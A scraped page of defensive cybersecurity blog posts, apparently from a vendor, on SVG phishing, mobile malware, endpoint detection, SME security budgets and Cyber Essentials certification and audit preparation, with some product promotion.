fbpx

What is SVG phishing and how do you defend against it?

SVG phishing

Phishing is one of the oldest cybercrime techniques in the book. Indeed, the first phishing email is thought to have originated back in the mists of time, around the year 1995. However, that doesn’t mean cybercriminals haven’t got creative in the years since. Added to recent innovations like smishing and Facebook Messenger scams, there’s a new threat to contend with: SVG phishing.

Here’s everything you need to know about this new threat, including what it is, how it works and, most importantly, how to counter it.

What is SVG phishing?

SVG phishing refers to the use of Scalable Vector Graphics (SVG) files in phishing attacks. An SVG is an image file format for creating and editing two-dimensional graphics. SVG files are a popular format for web and graphic design because they can be scaled up and down easily. 

Cybercriminals use these files to deliver malware or direct victims to spoof forms that steal victims’ credentials.

Why do cybercriminals use SVG phishing attacks?

SVG phishing has gained traction in the cyber underworld because of its ability to evade traditional security measures. SVG files are less frequently flagged as potentially suspicious by security tools designed to detect more common file types like PDFs. This allows phishing emails containing SVG attachments to bypass many email filters, giving cybercriminals a route into target organisations. 

How do SVG phishing attacks work in practice?

In practice, SVG attacks work much like any other phishing scam. Typically, a cybercriminal disguises the SVG files as legitimate documents or requests, using social engineering techniques to convince victims to open them.

It could be a request to edit a file from your ‘boss’ or a report that ‘requires your attention right now’, regardless, the techniques aren’t any more sophisticated than a typical phishing scam.

Once opened, these files can execute JavaScript, redirecting users to malicious websites, displaying fake login forms designed to capture sensitive information like passwords, or releasing malware into company systems. 

However, while many SVG attacks aren’t particularly sophisticated, cybercriminals are getting smarter in how they launch them. There’s evidence of some campaigns using images that mimic documents like Excel spreadsheets, these include embedded forms for credential harvesting.

Are there any famous examples?

SVG phishing techniques have been in use since at least 2015, but media reports tend not to differentiate them from other types of phishing. Nevertheless, there are a couple of recent examples that researchers have identified.

1. Agent Tesla Keylogger:  January – February 2024

Agent Tesla is a keylogger. It monitors keystrokes, takes screenshots, and steals passwords from various applications before sending the data back to the bad guys. It’s not a new form of malware; cybercriminals have been using it since around 2014, but in 2024, cybercriminals started delivering it via SVG files. 

This campaign used a spoof Microsoft Excel spreadsheet, delivered via phishing emails. Once the victim opened the spreadsheet a script was run unleashing Agent Tesla.

2. XWorm RAT:  December 2023 – present

The catchily named XWorm RAT is another form of malware, used for keylogging and stealing cryptocurrency wallets.

These campaigns used various techniques. Some used links embedded in phishing emails, and others included SVG files as attachments. Once opened, these SVG files initiated the download of zip archives containing XWorm RAT, unleashing the malware on the victim. 

For some great examples of real-world SVG campaigns, we recommend checking out Cofense’s excellent phishing database

What can you do to protect your business? 

There’s no doubt SVG phishing poses a serious threat, able to avoid detection by many email filtering tools. But that doesn’t mean there’s nothing you can do to protect your business.

Staff training

We’re always championing the benefits of staff security training, but it’s particularly important when it comes to phishing. By their nature, phishing campaigns rely on social engineering techniques so, if you can train staff to recognise the tell-tale signs, you can effectively neuter the threat.

What training looks like will depend on the expertise within your organisation. You could 

Implement realistic phishing simulations to test employee awareness or something more simple like webinars and videos. However you approach it, the key is that employees can quickly recognise suspicious emails and attachments. 

Limit SVG Handling

One surefire way to mitigate the threat posed by SVG phishing is to limit what your email or browser can do. You can configure email platforms and browsers to block or restrict script execution within SVG files. This stops hidden nasties like Agent Telsa or XWorm RAT from running their malicious code.

Configure email filtering

In a similar vein to the previous point, more advanced email security solutions will be able to analyse attachments for malicious content. Check whether yours can analyse scripts embedded in SVG files. However, it’s worth noting that many email providers can’t do this yet, which is part of the reason for the success of SVG phishing campaigns.

Use CDR Technology

Admittedly, this solution is likely to be beyond the financial reach of most small businesses. Content Disarm and Reconstruction (CDR) solutions are expensive and tend to be the preserve of large corporations and those organisations that need to spend a lot on security.

But, if you’re feeling particularly flush, CDR is a great option for disarming SVG phishing. CDR systems treat all incoming files as potentially harmful. They deconstruct any incoming files, removing anything malicious, before rebuilding them and sending them on to the recipient.  

Put policies in place 

If your staff don’t understand the dangers of SVG files or the safe behaviours expected of them, they’re much more likely to fall prey to a scam.

Develop policies for handling email attachments, especially those from unknown or dubious sources. You could also consider restricting certain file types in email communications unless they’re absolutely necessary for operations. 
Once you’ve set these policies, you need to ensure employees adhere to them. The best way to do this is to make them readily available (they’re no use buried in a long-forgotten corner of a shared drive) and log who’s read them. 

Dangerous, but avoidable...

SVG phishing is dangerous, but it doesn’t have to be an insurmountable problem. By implementing these strategies, your business can significantly reduce the risks and protect company data.

Want to know more about the threats facing small businesses like yours? Check out our latest research report on the mobile threats facing SMEs.

What is mobile malware, and how do you protect against it?

Mobile Malware

Mobile devices are essential to the hybrid workforce. Having remote access to critical business systems and data enables teams to communicate, collaborate, and work more efficiently – wherever they are. But this convenience also makes mobile devices an ideal target for cybercriminals. 

Among the growing list of threats, mobile malware is perhaps the most prevalent.

What is mobile malware?

Mobile malware is the umbrella term for malicious software specifically designed to target smartphones, tablets, and similar devices. It comes in various forms:

  • Viruses
  • Ransomware
  • Spyware
  • Trojan Horses
  • Worms

Cybercriminals employ a range of methods to deliver their nefarious payloads. These include disguising malicious software as legitimate apps – which infiltrate your device when you attempt to download them – and concealing compromised links or attachments in phishing emails and SMSs. Typically, the hacker’s goal is to:

  • Lock or delete important files
  • Steal sensitive data or hold it to ransom
  • Steal bank account details or financial information
  • Damage or hijack business devices
  • Spy on rival businesses

iOS vs Android: what’s more secure?

Like all Apple products, iOS has built-in safeguards to protect against cyber threats. This makes it more secure than Android, which uses an open-source model. However, neither operating system is infallible.

Common signs of infection

Mobile malware can cause serious harm if left unchecked – from costly operational downtime to reputational damage, fines, and even legal action. So, it’s crucial you know how to spot the signs of infection.

Give your device a thorough health check if you see any of these symptoms.

  • Poor performance
  • Drained battery
  • Overheating
  • Frequent crashing
  • Persistent pop-ups
  • Suspicious app downloads
  • Unexplained charges

Business mobile security pillar page ATCTA

8 tips to protect your business devices

Protecting your business devices against mobile malware doesn’t have to be time-consuming or expensive. From using secure Wi-Fi to investing in dedicated mobile device security, here are some quick, cost-effective steps to strengthen your defences.

1. Install security patches immediately

Apple and Android devices receive regular security patches – roughly every month or two. These critical updates fix flaws and vulnerabilities in your device’s operating systems. Install them as soon as possible or switch on automatic updates to close any obvious gaps in your security.

2. Only use trusted apps

Unregulated, third-party app stores are a haven for mobile malware and other cybersecurity threats. Mitigate this risk by enforcing stringent security policies that require employees to use trusted storefronts, like the Apple App Store and Google Play.

As obvious as it might sound, you can significantly reduce your cybersecurity risks by avoiding suspicious links and attachments. If you don’t recognise the sender’s email address, notice something strange about the message, or receive an unusual request, don’t click. It’s better to be safe than sorry.

4. Enforce a strong password policy

Have you ever used a well-known phrase as a password? Maybe a pet’s name? Perhaps you use the same one for every account? Don’t worry; there’s no judgement here. No one really likes passwords, but they’re a crucial component of mobile security.

Keep your devices and data secure by implementing a strong password policy that requires employees to use unique, complex passwords for every device. Follow these best practices to make them easier to manage:

  • Use a combination of four random nouns. E.g. fenceplanetoctopussauce
  • Use a mixture of upper- and lower-case letters, numbers, and special characters
  • Use a dedicated password manager to generate passwords for you and store them in a secure vault

5. Enable multi-factor authentication

Strong passwords alone may not be enough to deter tenacious cybercriminals. For added protection, enable multi-factor authentication (MFA) on your business devices and accounts. This requires employees to use two or more forms of verification, such as:

  • Passwords
  • PINs
  • Biometrics (e.g., a fingerprint or face scan)
  • Software tokens

6. Use password-protected Wi-Fi

Public networks are a convenient gateway to the internet, but they’re also exposed. To prevent cybercriminals from intercepting sensitive messages or launching harmful man-in-the-middle attacks, ensure employees only use password-protected Wi-Fi when working away from the office. If that isn’t possible, use a virtual private network (VPN) to encrypt network data and prevent unauthorised access.

7. Train your employees

68% of all breaches are the result of human error. So, running regular training sessions that teach staff how to identify and respond to cyber risks goes a long way to mitigating them. This includes when and how to share sensitive data, how to spot phishing attempts, and how to remove mobile malware. 

8. Install mobile cybersecurity software

For the highest level of security, you can’t beat dedicated mobile device security software. Designed specifically for smartphones and tablets, it constantly scans devices for common security risks, such as:

  • Misconfigurations
  • System vulnerabilities
  • Suspicious apps
  • Malicious content

It can also block untrustworthy websites and repel attacks in real-time. This gives you more time to respond if something does get past your defences.

Mitigate the mobile malware threat

Mobile malware attacks continue to rise as more employees use their smartphones for work. But by understanding the threat and adopting these simple measures, you can enjoy the benefits of hybrid working safely and securely.

Want to know more about mobile specific threats your business faces? Check out our SME Mobile Threat Report.

Endpoint detection and response: what is it and why do you need it?

Endpoint detection and response

Desktop computers, laptops, and mobile devices are often the first port of call for hackers looking to launch a cyber-attack. Collectively known as endpoints, hackers treat them as a convenient gateway into your systems.

However, there are ways to defend your business. And the most effective is with dedicated endpoint detection and response (EDR).

What is endpoint detection and response?

Coined by Gartner’s Anton Chuvakin in 2013, endpoint detection and response is a branch of cybersecurity technology that encompasses automated threat monitoring tools.

Where traditional antivirus software is reactive, EDR is proactive. Once installed, it continuously monitors your devices, collecting and analysing data in real time to detect cybersecurity threats. If it does, it responds automatically – repelling or containing the threat before it can spread.

Want to know more about protecting your business on a budget? Check out our guide.

How does it work?

Most endpoint detection and response solutions follow the same basic approach, even if their capabilities differ.

Step 1. Data collection

Working quietly in the background, the software collects data from each device on your network. This includes:

  • Authentication requests
  • Network connections
  • Configuration changes
  • Device performance

Then, it consolidates everything into a central database for easy access.

Step 2. Analysis and detection

Next, the software analyses the data and compares the results against global threat intelligence to identify threat indicators. These typically fall into one of two categories:

  1. Indicators of compromise (IOC): signs that a threat has breached a system or endpoint.
  2. Indicators of attack (IOA): pattern or behaviours that signal a cyber-attack is about to happen or in progress.  

Security team members can access this information directly from the software, allowing them to monitor threats across your business in real time.

Step 3. Response

Should the EDR software flag a potential threat, it automatically contains it. 

The nature of the response depends on the nature of the threat and your software’s capabilities. Typical responses include:

  • Notifying security personnel
  • Suspending the affected device(s) processes
  • Disconnecting the affected device(s) from your network
  • Triggering an antivirus scan

Step 4. Investigation and remediation

With the threat contained, security teams are free to investigate it. Some EDR software generates comprehensive reports that allow you to track incidents back to their source. This helps you pinpoint the root cause, track it's trajectory through your systems, and organise your response.

For example:

  • Patching the vulnerability
  • Updating detection rules
  • Deleting malicious files
  • Repairing or restoring damaged components

Step 5. Prevention and threat hunting

EDR software keeps detailed records of every incident. Security analysts can access this data at any time, learning from past incidents to prevent future ones. It also helps them:

  • Identify vulnerabilities
  • Track how specific threats develop over time
  • Support threat hunting exercises

Benefits of endpoint detection and response

Identify blind spots

At the highest level, endpoint detection and response is all about visibility. It lets you monitor every device in real time, highlighting misconfigurations and unsecured connections cybercriminals can exploit. With this information, you can plug gaps in your defences and put in place measures to prevent similar cases in future.

Spot emerging threats

Antivirus software is great at detecting known threats. It does this by comparing the threat’s unique signature against global threat intelligence databases.

However, this approach makes it less effective at combating emerging or evolving threats such as social engineering attacks, like phishing.

By contrast, EDR identifies threats by looking for signs of suspicious activity and behaviour. This means it can detect new and established threats. 

Block sophisticated attacks

Dynamic endpoint security and detection software combats advanced threats, outing it ahead of basic antivirus tools. This includes sophisticated malware variants that can go unnoticed for months, waiting for the perfect opportunity to strike, or adapt their behaviour to avoid detection.

Minimise or prevent damage

As an automated solution, EDR reduces the delay between threat detection and mitigation. Once it identifies a potential threat, the software immediately takes steps to contain and neutralise it. This prevents attacks from escalating, minimising the damage to your business and saving you from a costly clean-up operation. 

Your first line of defence

Even the most advanced antivirus software can’t catch every threat. New tactics and attack vectors emerge every day, some of which will make it past your security perimeter. 

Endpoint detection and response software works in tandem with your existing security tools. It forms a vital layer in your defence network, spotting the sophisticated threats traditional antivirus can’t see to keep your network, systems, and data safe.

Cost of living CTA 2

Cybersecurity budgets for SMEs: Are we doing enough to make the case?

Cybersecurity budgets for SMEs

Cybersecurity is a growing concern for businesses of all sizes, but the situation is particularly challenging for small and medium-sized enterprises (SMEs). Limited resources often mean smaller budgets for cybersecurity, leaving these organisations vulnerable to increasingly sophisticated cyberattacks. As a cybersecurity professional, whether you’re an MSP or consultant, you've likely faced the frustrating reality of tight budgets, even when the risks are clear.

A recent report by ISACA reveals a troubling statistic. 52% of cybersecurity professionals in Europe believe their organisation’s budget is insufficient. Yet, 58% of organisations expect to face an attack within the next 12 months. This disconnect suggests that many budget holders are still unconvinced of the need for stronger security measures.

In this blog, we’ll explore why cyber security budgets in SMEs tend to be lower, the misconceptions that drive this, and how you can better educate businesses as a cyber security professional. You’ll also discover practical ways to work within limited budgets while delivering effective protection.

Planning a cybersecurity budget

When it comes to cybersecurity, many SMEs operate under the belief that paying for basic protection is enough to keep them safe. “I pay for cybersecurity, so I’m secure,” is a common but misguided sentiment. In reality, most SMEs are just as much at risk as larger enterprises, yet their budgets are often disproportionately lower.

The reasons behind this are understandable. SMEs typically have fewer resources and often prioritise immediate business needs over long-term risks. However, as cyber threats grow more frequent and sophisticated, underfunding cybersecurity is a dangerous gamble. 

For cybersecurity professionals, the key challenge is not just to provide solutions but to effectively communicate the real-world impacts of insufficient protection. Businesses need to understand that the risk isn’t hypothetical. Recent data shows that 41% of businesses experienced more cyberattacks in the last year alone. 

This is where education becomes essential. By using statistics and real-life examples, you can help budget holders grasp the true risks and long-term costs of an attack, which often far outweigh the cost of prevention.

During the planning phase, we should consider risk assessments to help businesses understand their unique vulnerabilities. You can then use this information to tailor security solutions that align cybersecurity measures with a customer’s specific budget and needs. 

However,  education is the most important thing. Taking the time to explain how even a small increase in budget can significantly reduce risk.

Allocating a budget and prioritising

When budgets are tight, it’s crucial to help SMEs prioritise the areas where investment will have the greatest impact. To start, businesses must understand the cost of an attack. 

Downtime, reputational damage, and the cost of recovery can devastate a small business. For instance, ransomware attacks can result in 22 days of downtime on average, a crippling scenario for any SME. By outlining these potential outcomes, you can paint a clearer picture of the necessity of increased investment in cybersecurity.

When working within a limited budget, focus on the fundamentals. Schemes such as Cyber Essentials provide this, which is why the controls within this scheme are often described as the foundations of cybersecurity for any business.

Controls such as multi-factor authentication (MFA) can protect against the most common entry points for attackers. Applying the latest updates will ensure that your network has the latest patches and will not fall victim to an attacker exploiting a hole in third-party software.

One of the most cost-effective ways to reduce risk is to educate employees about cyber threats in particular how to recognise and respond to phishing attempts.

In short, the key is to ensure that budget holders understand the return on investment of cybersecurity. Investing in protection now will likely save them from much larger costs in the future.

Common mistakes and misconceptions

The mindset of small businesses thinking they are too small to be attacked puts organisations at risk and makes it harder for cybersecurity professionals to justify larger budgets.

Another frequent error is assuming that simply paying for a cybersecurity service guarantees complete protection. In reality, cybersecurity is not a one-and-done solution, it requires continuous monitoring, updating, and adjusting. Security professionals must guide businesses away from these misconceptions and towards a more realistic understanding of their vulnerabilities.

For example, a small business might believe that because they’ve installed antivirus software or a firewall they’re fully protected. However, the continuously evolving threat landscape means that yesterday’s security measures are often inadequate for today’s attacks. 

Part of a security professional's job is to clarify that cybersecurity is an ongoing process. Regular assessments, updates, and education are crucial to keeping an SME safe from the constantly changing tactics of cybercriminals.

Optimising cybersecurity investments

Even with a limited budget, there are ways to maximise the effectiveness of a business's cyber security investments. Cybersecurity professionals have the opportunity to help businesses make the most of what they have while still ensuring adequate protection.

The use of cost-effective security tools that offer solid protection. This ensures businesses are getting the best value for their investment. Tools such as CyberSmart Active Protect provide vulnerability management, security awareness training and policy management.

Often, the biggest vulnerabilities in an organisation aren’t its systems, but its people. Utilising the free resources CyberSmart offers such as white papers, blogs and webinars provides additional regular training to employees on concurrent threats and how to protect against them, as well as respond to them. This can greatly reduce the risk of an attack.

By helping businesses invest wisely, we can ensure they get the best possible protection within their financial constraints. It’s about balancing short-term costs with the long-term need for security and showing businesses that even a modest increase in their cyber security budget can significantly reduce their risk of a costly attack.

As cyber threats continue to grow, SMEs can no longer afford to view cyber security as an optional or secondary concern. The consequences of a successful attack can be devastating, and yet many businesses are still under-investing in their security measures. 

How to help your customers

For cybersecurity professionals, the task is twofold: educating businesses on the real risks they face and helping them allocate their budgets effectively. By focusing on clear communication, prioritising essential security measures, and optimising available resources, you can ensure that even the smallest budgets deliver real protection.

In the end, the key message to convey to businesses is simple: cybersecurity is an investment, not just a cost. And with the right approach, even a limited budget can provide meaningful protection against today’s ever-evolving cyber threats.

Want to know more about how to keep your customers safe on a smaller budget? Check out our guide to cybersecurity on a budget.

Cost of living CTA 2
















Cyber Essentials password policy best practices

cyber essentials password policy

One of the key aspects of securing your workforce is implementing strong passwords that comply with Cyber Essentials password policy best practices.

Cyber Essentials is a UK government-backed scheme that teaches businesses how to protect themselves from common online threats.

Why adopt Cyber Essentials password policy recommendations?

A weak password can be the difference between a secure system and a damaging data breach.

Cyber Essentials provides guidelines that help businesses protect themselves against cyber threats. Following them can reduce the risk of unauthorised access by ensuring your systems are as secure as possible.

Cyber Essentials password requirements

To get certified, your business must implement a password policy that meets the following requirements: 

1. Password complexity 

The NCSC recommends using its three random words approach to password creation. However, you can also use a randomly generated password created by a password manager. The key is that your passwords are complex and near-impossible to guess. 

2. Unique credentials

Reusing passwords across multiple personal and company accounts presents a major risk. If a hacker gets hold of them, they could gain access to sensitive data.

Cyber Essentials requires all employees to use unique passwords for every account. Password managers can help employees maintain unique passwords without the burden of remembering them all. 

3. Account lock-up mechanisms

Cyber Essentials recommends implementing account lock-up mechanisms to protect against brute-force attacks, where hackers attempt to guess passwords by trying different combinations. This temporarily locks accounts after a certain number of unsuccessful login attempts, requiring additional verification to regain access.

4. Multi-factor authentication

Multi-factor authentication (MFA) adds an essential layer of security that requires users to verify their identity using two or more methods. This might include a password, a pin, or even a fingerprint. 

Cyber Essentials strongly recommends implementing MFA for accessing all critical systems. This ensures that even if a hacker obtains a password, they can’t access sensitive data without the second verification step.

Implementing a CE password policy

Creating a Cyber Essentials-compliant password policy is the first step to securing your business. But ensuring your team adheres to it requires careful planning and execution. 

1. Employee training and awareness

Even the strongest password policy can fail if employees don’t know how to use it or where to find it. Every team needs regular training and reminders about the importance of strong passwords and the specific policy requirements.

Consider running interactive training sessions, webinars, and regular cybersecurity newsletters to keep employees informed and engaged. Highlight real-world examples of password-related breaches to emphasise the importance of compliance.

2. Password management tools

Managing multiple, complex passwords can be daunting. Password management tools offer a secure way to store and retrieve passwords, reducing the temptation to reuse or simplify them. 

These tools generate strong, random passwords for each account and store them securely. This makes it easier for employees to adhere to Cyber Essentials password policy best practices without sacrificing convenience. 

3. Monitoring and support

Implement monitoring tools that allow your IT team to oversee compliance and respond quickly to potential issues.

These tools can also help identify unusual patterns, such as multiple failed login attempts that may indicate a security breach. By monitoring these activities, you can prevent minor issues from escalating into major security incidents. 

4. Secure access solutions

Beyond passwords, implementing secure access solutions is crucial. Use secure channels such as VPNs to encrypt data and prevent hackers from intercepting it.

Executing a Cyber Essentials password policy

Securing your businesses' digital infrastructure is more important than ever as attacks become more frequent. A well-crafted password policy that complies with Cyber Essentials will protect your business from cybercriminals. 

To learn more about Cyber Essentials and how it can benefit your business, check out our guide to UK certifications.

Cybersecurity certifications

Cyber Essentials vs. Cyber Essentials Plus: which is best for your business

cyber essentials vs cyber essentials plus

If you've been considering a cybersecurity certification for your business, you've probably been weighing up Cyber Essentials vs Cyber Essentials Plus.

By choosing the right certification, you ensure that your cybersecurity measures align with your business’s specific needs and help you stay ahead of potential risks. Whether you need basic protection or a more thorough assessment, this guide will help you decide which certification is the best fit for you.

What are Cyber Essentials and Cyber Essentials Plus?

Cyber Essentials is a government-backed certification scheme designed to help businesses protect themselves from the most common cyber threats. This framework equips businesses with the essential steps needed to strengthen their defences and minimise security risks.

Cyber Essentials Plus follows the same fundamental framework but includes an additional independent audit, offering a higher level of security and assurance.

How are they similar?

Both Cyber Essentials and Cyber Essentials Plus follow the same five security controls:

  • Boundary firewalls and internet gateways: ensuring a secure internet connection
  • Secure configuration: guaranteeing devices are set up securely
  • User access control: restricting access to data and services
  • Malware protection: implementing defensive measures against viruses 
  • Patch management: keeping software and devices up to date

These controls are the backbone of the Cyber Essentials scheme, helping organisations mitigate risks and protect against common cyber threats.

How are they different?

The key distinction between Cyber Essentials and Cyber Essentials Plus lies in the assessment process.

Cyber Essentials

This certification ends with a self-assessment. You complete a questionnaire to confirm you’ve implemented the necessary security controls in your business. A certification body then reviews the assessment and decides whether you've met the qualification requirements.

Cyber Essentials Plus

Cyber Essentials Plus includes an independent audit. An auditor will thoroughly evaluate your security controls, ensuring you've implemented them correctly.

Advantages of Cyber Essentials and Cyber Essentials Plus

Cyber Essentials

Cyber Essentials is a cost-effective way to simplify and demonstrate your commitment to cybersecurity. It’s essential for companies bidding for government contracts. Not only does it provide a solid foundation for further security measures, but it also provides businesses with a competitive edge as it builds trust and allows you to bid for government contracts. 

Cyber Essentials Plus

The Plus certification offers enhanced credibility through third-party verification, increasing trust with customers and partners. This is especially for those in industries with strict data security regulations such as healthcare or the financial sector. It also helps you to stand out when securing contracts and increases protection against advanced threats. 

Cyber Essentials vs. Cyber Essentials Plus: the verdict

It might sound like a bit of a non-conclusion, but choosing between Cyber Essentials and Cyber Essentials Plus depends on your business's needs.

Cyber Essentials is a great starting point for businesses looking to demonstrate basic cybersecurity measures. However, if your industry demands higher assurance levels or if you handle sensitive data, Cyber Essentials Plus offers added credibility and support through independent verification.

Cybersecurity certifications



Is Cyber Essentials certification worth the investment?

Is Cyber Essentials worth the investment?

If you’re considering Cyber Essentials certification, you’ve probably got some questions about the process. Most importantly, what does it cost and is Cyber Essentials certification worth the investment? If so, we’ve got you covered. Read on for everything you need to know. 

How much does Cyber Essentials cost?

From 2014-2022, you paid a flat fee of £300 plus VAT to get a Cyber Essentials certification. However, in 2022, the National Cyber Security Centre (NCSC) adopted a tiered pricing structure. 

Under the new tiered system, Cyber Essentials costs range from £300 to £600 plus VAT. Tiers are decided by factors such as business size, number of locations, and the current level of cybersecurity measures in place.

This fee covers the assessment and certification process. However, the total cost can vary due to factors like the support required to meet the five assessment controls:

  • Firewalls
  • Secure configuration
  • Use access control
  • Malware protection
  • Patch management

Costs can also differ from certification body to certification body, with some charging for extra support, resubmissions and additional services. 

Ready to get started with Cyber Essentials Certification? CyberSmart offers the fastest and simplest route to certification on the market.

Why have Cyber Essentials costs changed?

With the rise of cloud services, remote work, and digital transformation, businesses face new challenges in securing their data and systems.

To address these changes, the NCSC and IASME Consortium updated the Cyber Essentials requirements, which now include:

  • Cloud services: ensuring secure configuration of cloud platforms
  • Multi-factor authentication (MFA): adding an extra layer of security for user logins
  • Password management: implementing stronger password policies
  • Security updates: regular software updates to protect against vulnerabilities
  • Remote working: securing remote access to company systems and data

These updates have led to more rigorous assessments, particularly for larger companies, and you’ll see this reflected in the new pricing.

The benefits of Cyber Essentials certification

Now for the most important question, is Cyber Essentials certification worth the investment? 

In short, yes. Cyber Essentials certification offers benefits to every organisation. Let’s take a look at some of the key reasons to invest in certification.

You’ll be more secure 

Cyber Essentials helps you put a strong security foundation in place. When its security controls are properly implemented, your organisation will be far better prepared to identify, prevent and respond to attacks. In fact, Cyber Essentials can reduce your cyber risk by up to 98.5%.

Reduced risk 

Cyber Essentials focuses on critical elements of your security like regularly patching applications and implementing multi-factor authentication (MFA). These and other controls dramatically reduce the risk of a breach.

Cost-effectiveness 

Although getting Cyber Essentials certified requires some investment, the upfront cost is negligible compared to the cost of a breach. The Department of Science Innovation and Technology (DSIT) estimates that the single most disruptive breach from the last 12 months cost businesses £1,205 on average.

It’s also worth noting that while that figure looks low, it’s for a single breach. Many organisations suffer multiple breaches per year, so the real cost is likely to be higher. Adopting robust security controls can help prevent a breach in the first place, saving your organisation money in the long run.

Assure customers and partners 

Gone are the days when cybersecurity and data protection were secondary concerns for customers. Research shows that 60% of men and women are more concerned about their personal data than a year ago. And this influences decision-making in the workplace. 

As a result, businesses are increasingly reluctant to work with organisations that can’t demonstrate a commitment to security. 

Completing Cyber Essentials allows you to demonstrate you take cybersecurity and data protection seriously. You’ll even get a digital badge to display on your website, ultimately,  helping you show your credentials and win business. 

Better response to incidents 

Every business hopes to avoid being breached. However, cybercriminals are resourceful and excellent at finding unknown vulnerabilities. Cyber Essentials can help you put in place the processes you need to recover quickly, even if the worst-case scenario does happen.

Ability to bid for government contracts 

Cyber Essentials will likely be mandated if your organisation is a government body. But, you may not know it also applies to government suppliers. Getting Cyber Essentials certified can give you the ability to bid for lucrative government contracts, opening up an additional revenue stream. Or, if you’re already a government supplier, help you keep that contract. 

Meet your compliance requirements 

While this doesn’t apply to every industry, there are many sectors where Cyber Essentials certification is mandatory or at the very least, strongly recommended for compliance. These include sectors like education, healthcare, financial services and law. 

What should you look for in a Cyber Essentials certification body? 

We’ve established why Cyber Essentials is worth the investment. However, not all certification providers are created equal. So, what should you look for when picking a certification body?

Unlimited support 

Cyber Essentials certification is usually a fairly straightforward process. Nevertheless, if it’s your first time or you have more complex needs (such as multiple offices or hybrid working) you’ll need support. Look for providers who offer unlimited support and provide ready access to auditors. 

Free resubmissions 

It’s not always possible to complete the certification process first-time. In many cases, you’ll need to remediate aspects of your IT estate. And, when this happens, some providers will charge you for resubmissions, so keep an eye out for those who don’t. 

In-assessment guidance and automation

Some certification bodies use assessment platforms that guide as you go or automate parts of the process. Although this can (but not always) mean a greater up-front cost, it’s well worth it for the time it’ll save you.

Ongoing protection

Cyber Essentials is a great first step, but year-round protection goes further than certification day. Look for providers that will help your business stay protected year-round through vulnerability scanning, threat detection and cyber insurance. 

Want to know more about cybersecurity certifications? Check out our guide to UK certifications for everything you need to know.

What to expect from Cyber Essentials audits

cyber essentials audit

If you’re looking to strengthen your cybersecurity and data protection processes, a Cyber Essentials or Cyber Essentials Plus certification could be right for you.

Cyber Essentials is a framework that provides guidance to help businesses protect themselves against cyber threats. The final step in the process is a self-assessment to ensure you’ve implemented the necessary tools and measures to protect your business. 

Cyber Essentials Plus adheres to the same security controls, but it offers hands-on technical verification and an independent, third-party audit for added peace of mind.

Why consider Cyber Essentials or Cyber Essentials Plus accreditation?

You might decide to go for Cyber Essentials or Cyber Essentials Plus accreditation because of:

  • Client assurance: demonstrate to clients that data protection is a top priority
  • Industry standards: you work in an industry with higher-than-standard cybersecurity requirements
  • Bid for government contracts: having Cyber Essentials is mandatory when bidding for government contracts and creates a clear distinction from other businesses
  • Improved security processes provide a framework to improve your internal processes, saving time, money, and stress when implementing your cybersecurity

What’s the difference between Cyber Essentials and Cyber Essentials Plus?

Cyber Essentials is an independently verified self-assessment certification that ensures an organisation adheres to the most robust cybersecurity controls.

Cyber Essentials Plus requires the exact same technical expectations as Cyber Essentials but also includes an independent technical audit of your IT systems. It adds an extra level of assurance, but the pass bar is slightly higher than Cyber Essentials' self-assessment.

To achieve Cyber Essentials Plus, you first need to be Cyber Essentials certified. Here's a breakdown of the steps involved:

Cyber Essentials 

Cyber Essentials has five security controls you must meet to achieve certification. 

  • Firewalls
  • Secure configuration
  • User access control
  • Malware protection
  • Security update management

Obtaining the Cyber Essentials certification includes completing a self-assessment questionnaire, which the certification body reviews. Business owners must approve the self-assessment answers before sending them. 

Is there a Cyber Essentials audit?

There is no Cyber Essentials audit. The self-assessment will provide a range of questions that relate to the five control areas of Cyber Essentials, and the certification will expire after 12 months.

Cyber Essentials Plus 

Cyber Essentials Plus includes an additional technical audit of your IT systems to verify you have the right controls in place. An external auditor assesses your devices, systems, and processes for additional validation and added protection. 

Want to protect your business from 98.5% of cyber threats? Get Cyber Essentials certified today.

Benefits of a Cyber Essentials Plus audit

  • Credibility: an independent audit is more credible than a self-assessment
  • Independent assessment: provides an additional layer of validation beyond the self-assessment required for Cyber Essentials
  • Compliance assurance: an objective, professional opinion ensures compliance, providing peace of mind
  • Client trust: provides external proof that you take cybersecurity and data management seriously, enhancing trust with clients

What to expect from the Cyber Essentials Plus auditor

During the Cyber Essentials Plus audit, the auditor will:

  • Confirm which devices need auditing
  • Scan devices to identify vulnerabilities using Nessus Professional scanning software
  • Observe email processing with test attachments
  • Check downloads of file attachments from test websites
  • Verify that you've installed and configured your antivirus software correctly
  • Test multi-factor authentication (MFA) on applicable cloud services
  • Assess how well default browsers block malicious activity
  • Confirm account separation between admin and user accounts
  • Capture screenshots for evidence

Prepare for your Cyber Essentials Plus audit:

Information to give the auditor

  • Administrator-level domain access or create a new admin account
  • A list of all in-scope devices and operating systems
  • User email addresses for email/web tests
  • A signed consent form

Check and update software:

  • Ensure all devices, including servers, are up to date
  • Download and install the 7-day trial of Nessus Professional for a credentialed patch scan or use an alternative PCI-approved scanning tool
  • Remove unused software from all devices

If you run Windows:

  • Enable file and print sharing. You can find this option in advanced sharing settings

If you run Windows 10:

  • Set the Windows service “RemoteRegistry” start-up type to “manual.” Access this by typing “services” in the home screen search bar
  • Create a new registry value:
  • Type “regedit” in the home screen search bar
  • Hive and key path: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem
  • On System, right-click and select New –> DWORD (32-bit) Value / REG_DWORD
  • Value name: LocalAccountTokenFilterPolicy
  • Value data: 1 (decimal)

If you run macOS:

  • Enable file sharing and remote login. You’ll find these options in System Preferences –> Sharing
  • Update AV engines and signature files. If you use an enterprise management dashboard to do this, even better
  • Activate and update AV plugins for every browser

Need more support?

If you’re not ready for a Cyber Essentials self-assessment or Cyber Essentials Plus audit, don’t rush into it. Make sure you’re prepared and consider your industry, goals, size, and the benefits of gaining a certification. 

Proving your cybersecurity credentials is important, and you can take it slow by starting with Cyber Essentials before graduating to Cyber Essentials Plus. By following these steps, you’ll be well-prepared for your Cyber Essentials self-assessment or Cyber Essentials Plus audit. 

For more guidance, download our comprehensive guide to cybersecurity certifications in the UK.

Cybersecurity certifications



What is Cyber Essentials? Mastering the five controls of SME cybersecurity

what is cyber essentials

You might have heard that it’s something your business needs, but what is Cyber Essentials? 

Cyber Essentials is a government-backed scheme designed to help SMEs protect themselves and stay productive in a world of increasing cyber threats. And with 50% of UK businesses becoming victims of cybercrime in 2024 so far, many consider it a requirement rather than a consideration.

Why is Cyber Essentials important?

The sad truth is that every business, no matter how small, could become a target of a cyber-attack. And growing supply chains and reliance on technology services can add to your vulnerability.

